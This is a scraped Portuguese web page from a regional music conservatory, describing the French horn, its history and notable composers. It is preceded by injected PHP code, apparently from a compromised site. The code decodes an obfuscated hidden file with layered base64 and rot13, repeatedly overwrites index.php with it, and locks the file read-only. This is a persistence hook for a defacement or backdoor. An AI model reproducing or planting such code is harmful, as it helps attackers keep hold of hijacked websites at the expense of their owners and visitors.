$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Trompa – Conservatório Regional do Baixo Alentejo

Trompa

A Trompa é um instrumento de sopro executado através de um sistema que os músicos designam de bocal. Apresenta-se habitualmente a solo ou integrada em diversas formações tais como orquestra e agrupamentos de música de câmara. A história da trompa começa há milhares de anos quando o homem aprendeu a usar chifres de animais como instrumento de sinalização e comunicação. Quando surgiram as técnicas metalúrgicas, o instrumento deixou de ser feito de chifre, passando a ser feito de metal. Os tubos que constituem o instrumento têm, na totalidade, um comprimento de quase quatro metros que não são visualmente percetíveis, visto que os tubos se enrolam sobre si próprios. Inúmeros compositores escreveram obras relevantes nas quais a trompa assume um papel de destaque como, por exemplo, Georg Phillipp Telemann (1681 – 1767), Wolfgang Amadeus Mozart (1756 – 1791) e Carl Maria von Weber (1786 – 1826), entre outros.